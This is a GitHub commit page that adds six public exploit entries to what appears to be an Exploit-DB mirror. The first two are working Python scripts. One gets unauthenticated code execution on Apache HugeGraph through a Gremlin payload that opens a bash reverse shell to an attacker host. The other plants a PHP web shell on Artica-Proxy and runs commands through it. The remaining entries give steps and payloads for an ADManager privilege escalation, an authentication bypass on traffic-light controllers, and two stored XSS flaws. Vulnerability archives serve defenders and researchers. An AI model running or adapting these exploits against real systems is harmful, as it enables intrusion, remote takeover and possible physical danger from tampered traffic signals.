Skip to content

Commit 60a4f4b

Browse files
author
certcc-ghbot
committed
Merge remote-tracking branch 'upstream/main'
2 parents 317bceb + 762197d commit 60a4f4b

File tree

10 files changed

+572
-0
lines changed

10 files changed

+572
-0
lines changed

exploits/java/webapps/52149.py

Lines changed: 56 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,56 @@
1+
# Exploit Title: Apache HugeGraph < 1.2.0 Remote Code Execution (Unauthenticated)
2+
# Exploit Author: Yesith Alvarez
3+
# Vendor Homepage: https://hugegraph.apache.org/docs/download/download/
4+
# Version: Apache HugeGraph 1.0.0 - 1.2.0
5+
# CVE : CVE-2024–27348
6+
7+
from requests import Request, Session
8+
import sys
9+
import json
10+
11+
def title():
12+
print('''
13+
14+
______ _______ ____ ___ ____ _ _ ____ _____ _____ _ _ ___
15+
/ ___\ \ / / ____| |___ \ / _ \___ \| || | |___ \___ |___ /| || | ( _ )
16+
| | \ \ / /| _| _____ __) | | | |__) | || |_ _____ __) | / / |_ \| || |_ / _ \
17+
| |___ \ V / | |__|_____/ __/| |_| / __/|__ _|_____/ __/ / / ___) |__ _| (_) |
18+
\____| \_/ |_____| |_____|\___/_____| |_| |_____/_/ |____/ |_| \___/
19+
20+
[+] Reverse shell
21+
Author: Yesith Alvarez
22+
Github: https://github.com/yealvarez
23+
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
24+
Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024–27348/exploit.py
25+
''')
26+
27+
28+
def exploit(url, lhost, lport):
29+
payload = {"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"VICARIUS\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"bash\", \"-c\", \"bash -i>&/dev/tcp/"+lhost+"/"+lport+"\", \"0>&1\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}}
30+
headers = {
31+
'Content-Type': 'application/json'}
32+
s = Session()
33+
url = url + "/gremlin"
34+
req = Request('POST', url, json=payload, headers=headers)
35+
prepped = req.prepare()
36+
del prepped.headers['Content-Type']
37+
resp = s.send(prepped,
38+
verify=False,
39+
timeout=15)
40+
print(prepped.headers)
41+
print(url)
42+
print(resp.headers)
43+
print(payload)
44+
print(resp.status_code)
45+
print(resp.text)
46+
47+
48+
if __name__ == '__main__':
49+
title()
50+
if(len(sys.argv) < 4):
51+
print('[+] USAGE: python3 %s https://<target_url> lhost lport \n'%(sys.argv[0]))
52+
print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.2 4444\n'%(sys.argv[0]))
53+
print('[+] Do not forget to run the listener: nc -lvp 4444\n')
54+
exit(0)
55+
else:
56+
exploit(sys.argv[1],sys.argv[2],sys.argv[3])
Lines changed: 62 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,62 @@
1+
# Exploit Title: ManageEngine ADManager Plus Build < 7210 Elevation of
2+
Privilege Vulnerability
3+
# Exploit Author: Metin Yunus Kandemir
4+
# Vendor Homepage: https://www.manageengine.com/
5+
# Software Link: https://www.manageengine.com/products/ad-manager/
6+
# Details: https://docs.unsafe-inline.com/0day/admanager-plus-build-less-than-7210-elevation-of-privilege-vulnerability-cve-2024-24409
7+
# Version: ADManager Plus Build < 7210
8+
# Tested against: Build 7203
9+
# CVE: CVE-2024-24409
10+
11+
12+
# Description
13+
The Modify Computers is a predefined role in ADManager for managing
14+
computers. If a technician user has the Modify Computers privilege
15+
over a computer can change the userAccountControl and
16+
msDS-AllowedToDelegateTo attributes of the computer object. In this
17+
way, the technician user can set Constrained Kerberos Delegation over
18+
any computer within the Organizational Unit that the user was
19+
delegated.
20+
21+
Contrary to what ADManager claims the user who has the Modify
22+
Computers role can change the privilege of computer objects in the
23+
Active Directory. The Constrained Kerberos Delegation can be set for
24+
any service such as CIFS, LDAP, HOST services. Then the user can
25+
access these services by abusing the Constrained Kerberos Delegation.
26+
In addition, the Unconstrained Kerberos Delegation can be set over the
27+
computer objects by changing the userAccountControl attribute.
28+
Normally, only users that have SeEnableDelegationPrivilege privilege
29+
can set constrained kerberos delegation. Only members of the
30+
BUILTIN\Administrators group have this privilege by default. The
31+
delegated user for an Organizational Unit can not set constrained
32+
kerberos delegation even if a user has the GenericAll right over a
33+
computer account, so the delegation process in Active Directory does
34+
not grant this privilege. However, the technician user can use the
35+
SeEnableDelegationPrivilege right via the Modify Computers role.
36+
37+
# Vulnerability reasons
38+
1. ADMP Web App Authorization issue: Assigning a predefined Modify
39+
Computers role delegates the technician user to modify custom
40+
attributes of computers unexpectedly. Even though it appears that this
41+
privilege is not granted in the UI, the Additional Custom Attribute
42+
property is assigned and this leads to broken access control
43+
vulnerability.
44+
45+
2. There is no restriction for editing the userAccountControl and
46+
msDS-AllowedToDelegateTo attributes of the computer objects. The ADMP
47+
application performs changes with domain admin privileges as designed
48+
so that if we can bypass some restrictions (e.g. format of attribute
49+
value), our requests are applied with domain admin privileges. This
50+
way we can edit the attributes userAccountControl and
51+
msDS-AllowedToDelegateTo.
52+
53+
# Impact
54+
A technician user elevates privileges from Domain User to Domain
55+
Admin. For example, the user can set Constrained Kerberos Delegation
56+
over CLIENT1$ for the CIFS service of the domain controller and access
57+
the CIFS service. As a result, the user is delegated to manage
58+
CLIENT1$ but he can access the CIFS service of the domain controller
59+
impersonating a user unexpectedly.
60+
61+
# Proof Of Concept
62+
https://docs.unsafe-inline.com/0day/admanager-plus-build-less-than-7210-elevation-of-privilege-vulnerability-cve-2024-24409
Lines changed: 24 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,24 @@
1+
# Exploit Title: MaxTime Database Editor 1.9 Authentication Bypass
2+
# Google Dork: N/A
3+
# Date: 07/09/2024
4+
# Exploit Author: Andrew Lemon/Red Threat https://redthreatsec.com
5+
# Vendor Homepage: https://www.q-free.com
6+
# Software Link: N/A
7+
# Version: 1.9
8+
# Tested on: (Intelight x-1) Linux 3.14.57
9+
# CVE : CVE-2024-38944
10+
11+
## Vulnerability Description
12+
This vulnerability allows remote attackers to bypass authentication on affected installations of MaxTime Database Editor.
13+
Authentication is not required to exploit this vulnerability.
14+
15+
The specific flaw exists within the web-based UI on Traffic Controllers running version 1.9.x firmware.
16+
The issue results from the lack of authentication prior to allowing access to functionality.
17+
An attacker can leverage this vulnerability to gain full control of Intelight Traffic Controllers and modify the configuration of a traffic intersection,
18+
modify traffic light sequences, or trigger the intersection to go into 4 way flash causing a denial of service and causing traffic congestion.
19+
20+
## Steps to Reproduce
21+
22+
Navigate to the IP address of an identified controller
23+
When prompted for authentication append /cgi-bin/generateForm.cgi?formID=142 to the end of the IP address
24+
Under the web security tab change the drop down from enabled to disabled and select apply or take note of the username and password and login with those.

exploits/php/webapps/52146.py

Lines changed: 78 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,78 @@
1+
# Exploit Title: CVE-2024-2054 Artica-Proxy administrative web
2+
application insecure deserialization (RCE)
3+
# Google Dork:
4+
# Date: 23-04-2024
5+
# Exploit Author: Madan
6+
# Vendor Homepage: https://artica-proxy.com/
7+
# Version: 4.40, 4.50
8+
# Tested on: [relevant os]
9+
# CVE : CVE-2024-2054
10+
11+
you can also find the exploit on my github repo:
12+
https://github.com/Madan301/CVE-2024-2054
13+
14+
15+
import requests
16+
import base64
17+
import urllib3
18+
from colorama import Fore
19+
20+
print("Url format Ex: https://8x.3x.xx.xx:9000 the port 9000 might
21+
sometimes vary from how artica proxy interface is hosted")
22+
23+
URL = input("Enter url: ")
24+
if URL[-1]=="/":
25+
ACTUAL_URL = URL[:-1]
26+
else:
27+
ACTUAL_URL = URL
28+
29+
ARTICA_URL = ACTUAL_URL
30+
31+
def check(ARTICA_URL):
32+
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
33+
try:
34+
check = requests.get(ARTICA_URL+'/wizard/wiz.upload.php',verify=False)
35+
except Exception as e:
36+
print(Fore.RED+"Could not reach, check URL")
37+
if check.status_code==200:
38+
print(Fore.GREEN+"Vulnerable")
39+
return True
40+
else:
41+
print(Fore.RED+"Not Vulnerable")
42+
43+
44+
def exploit(ARTICA_URL):
45+
46+
payload = base64.b64encode(b"<?php system($_GET['cmd']); ?>").decode()
47+
payload_data = {
48+
"TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI": {
49+
"cache_file": "/usr/share/artica-postfix/wizard/wiz.upload.php",
50+
"cache_serializer": "json",
51+
"cache_size": 999999999,
52+
"cache_data": {
53+
payload: {
54+
"cache_date": 0,
55+
"ttl": 999999999
56+
}
57+
}
58+
}
59+
}
60+
61+
62+
while True:
63+
PAYLOAD_CMD = input("enter command: ")
64+
url = f"{ARTICA_URL}/wizard/wiz.wizard.progress.php?build-js={payload_data}"
65+
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
66+
response = requests.get(url, verify=False)
67+
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
68+
if response.status_code == 200:
69+
cmd_url = f"{ARTICA_URL}/wizard/wiz.upload.php?cmd={PAYLOAD_CMD}"
70+
cmd_response = requests.get(cmd_url, verify=False)
71+
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
72+
print(cmd_response.text)
73+
else:
74+
print("Failed to execute the payload")
75+
76+
check = check(ARTICA_URL=ACTUAL_URL)
77+
if check==True:
78+
exploit(ARTICA_URL=ARTICA_URL)

exploits/php/webapps/52147.NA

Lines changed: 39 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,39 @@
1+
# Exploit Title: Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)
2+
# Date: 04/28/2024
3+
# Exploit Author: Ahmet Ümit BAYRAM
4+
# Vendor Homepage: https://anchorcms.com/
5+
# Software Link:
6+
https://github.com/anchorcms/anchor-cms/archive/refs/tags/0.12.7.zip
7+
# Version: latest
8+
# Tested on: MacOS
9+
10+
# Log in to Anchor CMS.
11+
# Click on "Create New Post".
12+
# Fill in the "Title" and enter the following payload in the field
13+
immediately below:
14+
# "><script>alert()</script>
15+
# Go to the homepage, and you will see the alert!
16+
17+
18+
### PoC Request ###
19+
20+
POST /anchor/admin/posts/edit/2 HTTP/1.1
21+
Host: 127.0.0.1
22+
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)
23+
Gecko/20100101 Firefox/124.0
24+
Accept: */*
25+
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
26+
Accept-Encoding: gzip, deflate, br
27+
X-Requested-With: XMLHttpRequest
28+
Content-Type: application/x-www-form-urlencoded
29+
Content-Length: 278
30+
Origin: http://127.0.0.1
31+
Connection: close
32+
Referer: http://127.0.0.1/anchor/admin/posts/edit/2
33+
Cookie: PHPSESSID=8d8apa3ko6alt5t6jko2e0mrta;
34+
anchorcms=hlko7b1dbdpjgn58himf2obht5
35+
Sec-Fetch-Dest: empty
36+
Sec-Fetch-Mode: cors
37+
Sec-Fetch-Site: same-origin
38+
39+
token=OqyPlxKQyav5KQYMbSErNCqjIfCoUGS9GZA3y3ZpnshDgb8IL8vH3kioFIKsO9Kf&title=test&markdown=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&slug=aaaa&created=2024-04-28+12%3A20%3A36&description=&status=published&category=1&css=&js=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&autosave=false

exploits/php/webapps/52150.NA

Lines changed: 69 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,69 @@
1+
# Exploit Title: ResidenceCMS <= 2.10.1 Stored Cross-Site Scripting
2+
via Content Form
3+
# Date: 8-7-2024
4+
# Category: Web Application
5+
# Exploit Author: Jeremia Geraldi Sihombing
6+
# Version: 2.10.1
7+
# Tested on: Windows
8+
# CVE: CVE-2024-39143
9+
10+
Description:
11+
----------------
12+
A stored cross-site scripting (XSS) vulnerability exists in
13+
ResidenceCMS 2.10.1 that allows a low-privilege user to create
14+
malicious property content with HTML inside it, which acts as a
15+
stored XSS payload. If this property page is visited by anyone
16+
including the administrator, then the XSS payload will be triggered..
17+
18+
Steps to reproduce
19+
-------------------------
20+
21+
1. Login as a low privilege user with property edit capability.
22+
23+
2. Create or Edit one of the user owned property
24+
(We can user the default property owned by the user).
25+
3. Fill the content form with XSS payload using the Code View feature.
26+
Before saving it make sure to go back using the usual view to see if the HTML
27+
is rendered or not.
28+
29+
Vulnerable parameter name: property[property_description][content]
30+
31+
Example Payload: <img src="x" onerror="alert(document.cookie)">
32+
33+
4. After saving the new property content and clicking the 'Finish Editing',
34+
go to the page and see the XSS is triggered.
35+
It is possible to trigger the XSS by using any account or even
36+
unauthorized account.
37+
38+
Burp Request
39+
-------------------
40+
41+
POST /en/user/property/7/edit HTTP/1.1
42+
Host: localhost
43+
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0)
44+
Gecko/20100101 Firefox/127.0
45+
Accept: text/html,application/xhtml
46+
xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
47+
Accept-Language: en-US,en;q=0.5
48+
Accept-Encoding: gzip, deflate, br
49+
Content-Type: application/x-www-form-urlencoded
50+
Content-Length: 1111
51+
Origin: http://localhost
52+
Connection: keep-alive
53+
Referer: http://localhost/en/user/property/7/edit
54+
Cookie: REMEMBERME=App.Entity.User:dXNlcg~~:1722991344:s-spusttpMsLQb2wlzMc2GJcKATcKhGTfj1VuV8GOFA~dRl86I12JAEzbjfmLzxK4ps0tMcX9WH15-DfzD115EE~;
55+
PHPSESSID=fhp06bc4sc5i8p4fk5bt9petii; sidebar-toggled=false
56+
Upgrade-Insecure-Requests: 1
57+
Sec-Fetch-Dest: document
58+
Sec-Fetch-Mode: navigate
59+
Sec-Fetch-Site: same-origin
60+
Sec-Fetch-User: ?1
61+
Priority: u=1
62+
63+
property[city]=3&property[district]=&property[neighborhood]=3&property[metro_station]=&property[dealType]=1&property[category]=1&property[bathrooms_number]=&property[bedrooms_number]=2&property[max_guests]=6&property[property_description][title]=Furnished
64+
renovated 2-bedroom 2-bathroom
65+
flat&property[property_description][meta_title]=&property[property_description][meta_description]=Furnished
66+
renovated 2-bedroom 2-bathroom flat&property[address]=5411 Bayshore
67+
Blvd, Tampa, FL
68+
33611&property[latitude]=27.885095&property[longitude]=-82.486153&property[show_map]=1&property[price]=2200&property[price_type]=mo&property[features][]=1&property[features][]=2&property[features][]=4&property[features][]=6&property[features][]=8&property[property_description][content]=<img
69+
src="x" onerror="alert(document.domain)">&files=&property[_token]=09e8a0ac823.ahexkItiSa6gSwce8RFyNpn94Uqu9g1cc4CN6g-zLsE.PSHrpu87DJzVcjJ1smI1c8-VrjjGuHUGMefsg3XWdJcuL9_F2Cc_ncMsSg

0 commit comments

Comments
 (0)